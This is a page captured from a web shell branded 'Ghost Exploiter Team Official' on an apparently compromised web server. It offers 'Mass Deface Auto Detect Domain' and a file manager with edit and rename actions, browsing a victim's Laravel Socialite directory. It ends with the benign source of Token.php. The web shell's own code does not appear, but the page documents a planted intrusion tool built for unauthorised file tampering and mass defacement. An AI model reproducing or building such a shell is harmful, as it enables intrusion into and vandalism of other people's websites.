webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
socialite
/
src
/
Two
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
AbstractProvider.php
13.134KB
edt
ren
BitbucketProvider.php
2.843KB
edt
ren
FacebookProvider.php
4.401KB
edt
ren
GithubProvider.php
2.517KB
edt
ren
GitlabProvider.php
1.729KB
edt
ren
GoogleProvider.php
2.026KB
edt
ren
InvalidStateException.php
0.141KB
edt
ren
LinkedInOpenIdProvider.php
2.042KB
edt
ren
LinkedInProvider.php
4.146KB
edt
ren
ProviderInterface.php
0.406KB
edt
ren
SlackProvider.php
2.593KB
edt
ren
Token.php
1.038KB
edt
ren
TwitterProvider.php
3.032KB
edt
ren
User.php
1.65KB
edt
ren
<?php namespace Laravel\Socialite\Two; class Token { /** * The user's access token. * * @var string */ public $token; /** * The refresh token that can be exchanged for a new access token. * * @var string */ public $refreshToken; /** * The number of seconds the access token is valid for. * * @var int */ public $expiresIn; /** * The scopes the user authorized. The approved scopes may be a subset of the requested scopes. * * @var array */ public $approvedScopes; /** * Create a new token instance. * * @param string $token * @param string $refreshToken * @param int $expiresIn * @param array $approvedScopes */ public function __construct(string $token, string $refreshToken, int $expiresIn, array $approvedScopes) { $this->token = $token; $this->refreshToken = $refreshToken; $this->expiresIn = $expiresIn; $this->approvedScopes = $approvedScopes; } }